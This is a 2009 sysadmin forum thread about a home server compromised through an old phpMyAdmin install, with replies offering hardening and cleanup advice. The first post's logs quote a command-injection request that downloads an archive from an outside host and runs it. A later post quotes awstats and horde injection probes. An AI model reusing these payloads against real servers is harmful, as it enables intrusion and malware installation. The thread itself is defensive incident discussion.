# fighting against hackers

## MorpheuS.Ibis

Hi,

I have had my home server hacked (kind of, DDOSed through old phpmyadmin), and would like to know if/how can I fight back (seems that they didn't get better than apache, so I have logs)

```

94.187.43.174 - - [12/Aug/2009:15:54:35 +0200] "GET //phpmyadmin//config/config.inc.php?c=uptime;uname%20-a HTTP/1.1" 200 192

94.187.1.11 - - [12/Aug/2009:18:10:14 +0200] "GET //phpmyadmin//config/config.inc.php?c=cd%20/tmp;wget%20http://colsaccap.us/flewd.tar;tar%20zxvf%20flewd.tar;rm%20-rf%20flewd.tar;cd%20.b;chmod%20+x%20*;./start.sh HTTP/1.1" 200 202

64.206.161.197 - - [13/Aug/2009:17:22:02 +0200] "GET //phpmyadmin/config/config.inc.php?c=uptime;uname%20-a HTTP/1.0" 200 192

```

anyone can help? phpmyadmin is already long gone, and I might introduce some hardening techniques.

----------

## krinn

what you are trying to do is illegal in many countries, and the fact they do illegal stuff on you doesn't legit you to reply as them.

and you'll end up fighting someone's computer that was hacked and used to bug you. Ending with bugging someone's computer that was already fucked up, and not giving any troubles to the real author.

Secure your computer and stop your fool war.

----------

## cach0rr0

heh...that aint a DDoS, that's a remote file inclusion vuln. 

Be curious to see if they were successful wget'ing that file. 

And why the hell isn't your phpmyadmin behind .htaccess+.htpasswd? 

They should never even get TO phpmyadmin; they should never get a chance to attack the webapp itself. They should be force to brute-force a password before they can so much as even attempt to exploit phpmyadmin

----------

## MorpheuS.Ibis

 *cach0rr0 wrote:*   

> heh...that aint a DDoS, that's a remote file inclusion vuln. 
> 
> Be curious to see if they were successful wget'ing that file. 
> 
> And why the hell isn't your phpmyadmin behind .htaccess+.htpasswd? 
> ...

 

yeah they succeeded, it unpacked some binaries (guess thats why uname went first), and executed them, changing my decent 10mbit connection to 200ms latency 90% drop (for pings), and IMHO thats DoS (pretty annoying when I am not at home most of the time and use the computer to host my IM and some files)

if you want I can pack the stuff it left and upload it somewhere for study

well I used the phpmyadmin about two times, and since stopped using mysql, so I thought it won't do any harm to keep lying there (plus I don't have a DNS name pointing to my IP)

and more, I run hardened kernel, and try all the local root exploits i find, so I thought they can't do me something that bad (all of it was running as apache)

----------

## slackline

 *krinn wrote:*   

> what you are trying to do is illegal in many countries, and the fact they do illegal stuff on you doesn't legit you to reply as them.
> 
> and you'll end up fighting someone's computer that was hacked and used to bug you. Ending with bugging someone's computer that was already fucked up, and not giving any troubles to the real author.
> 
> Secure your computer and stop your fool war.

 

Without further clarification "fighting back" may simply imply that MorpheuS.Ibis wants to make his system more secure to avoid it happening again.  

There was no explicit request or insinuation  thereof for how to stage a counter attack (unless the original post has been modified since you responded).  More likely a poor choice of wording.  Remember not everyone's primary language is English (and even if it is not everyone uses it correctly).

slack

----------

## cach0rr0

 *MorpheuS.Ibis wrote:*   

> 
> 
> yeah they succeeded, it unpacked some binaries (guess thats why uname went first), and executed them, changing my decent 10mbit connection to 200ms latency 90% drop (for pings), and IMHO thats DoS (pretty annoying when I am not at home most of the time and use the computer to host my IM and some files)
> 
> 

 

This is a good reason to have /tmp on a separate mount, as noexec nosuid

Also a good idea to have session.save_path set to something besides /tmp, disable file_uploads in PHP for hosts that don't require file uploads - tonnes of miscellaneous PHP hardening stuff to be done. 

Running a hardened kernel protects your apps

Running apps built with PIE/SSP protects the apps YOU build from being exploited

But if someone uploads a file to your box, and executes it, the hardened kernel isn't going to provide you heaps of protection. A hardened kernel does NOT remove the need to properly secure your applications; including php, and especially things like phpmyadmin. 

Now, things like grsec policies might prevent this, but most people who just follow the guides don't bother with fine-tuning their grsec policies. They should - it makes a huge difference. 

 *Quote:*   

> 
> 
> if you want I can pack the stuff it left and upload it somewhere for study
> 
> 

 

Nah, pretty sure I know what it was - pretty sure it's SirVic's ssh brute forcer, from the look of things. 

 *Quote:*   

> 
> 
> well I used the phpmyadmin about two times, and since stopped using mysql, so I thought it won't do any harm to keep lying there (plus I don't have a DNS name pointing to my IP)
> 
> 

 

You should still ALWAYS protect your webapps from direct exploitation via .htaccess/.htpasswd whenever possible; phpmyadmin especially so. 

 *Quote:*   

> 
> 
> and more, I run hardened kernel, and try all the local root exploits i find, so I thought they can't do me something that bad (all of it was running as apache)

 

I would boot thus from an updated thumb drive, and do the usual chkrootkit, rkhunter, as well even clamav seems to do a decent job of finding this sort of stuff. 

Don't trust your kernel. I *never* do if one of my boxes gets compromised in even the smallest fashion. Boot from a thumb drive or CD using a distro that has rkhunter/chkrootkit/clamav updated and included.

----------

## Bircoph

Try to use -j TARPIT iptables target, together with -m limit this is real power. This will turn your firewall to offensive one, you may completely block any possible networks activities from attacked system. Thanks to this yummy my server survived dosens of DDoS attacks.

You need no recompile your iptables and some kernel models (or kernel itself) to do this. Patches are available via patch-o-matic. Learn this patchset, it will provide you a lot of powerfull tools, not only TARPIT target.

And do not forget about -m recent module.

----------

## ScarletPimpFromHell

I've noticed that http transport exploit attempts are on the rise with my http server as well, for example ...

```

61.156.31.20 - - [18/Aug/2009:05:11:21] "GET /manager/html HTTP/1.1" 404 274

110.45.146.134 - - [18/Aug/2009:06:33:53] "GET /awstats.pl?configdir=|echo;id%00 HTTP/1.0" 404 272

66.249.65.87 - - [18/Aug/2009:06:37:19] "GET /robots.txt HTTP/1.1" 404 294

202.121.138.74 - - [18/Aug/2009:06:54:22] "GET /awstats.pl?configdir=|echo;id%00 HTTP/1.0" 404 272

202.121.138.74 - - [18/Aug/2009:07:15:21] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;id%00 HTTP/1.0" 404 288

202.121.138.74 - - [18/Aug/2009:08:39:22] "GET /cgi-bin/awstats.pl?configdir=|echo;id%00 HTTP/1.0" 404 280

202.121.138.74 - - [18/Aug/2009:08:43:41] "GET /awstats/awstats.pl?configdir=|echo;id%00 HTTP/1.0" 404 280

202.121.138.74 - - [18/Aug/2009:09:14:33] "GET /horde/services/help/?show=about&module=;%22.passthru(%22id%22); HTTP/1.0" 404 282

91.199.207.60 - - [18/Aug/2009:09:19:33] "GET //phpMyAdmin/ HTTP/1.1" 404 273

91.199.207.60 - - [18/Aug/2009:09:19:34] "GET //phpmyadmin/ HTTP/1.1" 404 273

202.121.138.74 - - [18/Aug/2009:09:22:56] "GET /services/help/?show=about&module=;%22.passthru(%22id%22); HTTP/1.0" 404 276

```

Im exploring the possibility of creating IPS signatures to shun smacktards that try these explots. Does anyone know of a comprehensive list or site that documents these exploits ?

----------

## cach0rr0

not offhand, though you could always pilfer sigs from Snort and mod_security

Just be mindful of the mod_sec stuff; some silly rules (amongst some decent ones, in fairness), and some amateurish less than speedy regex last i looked

----------

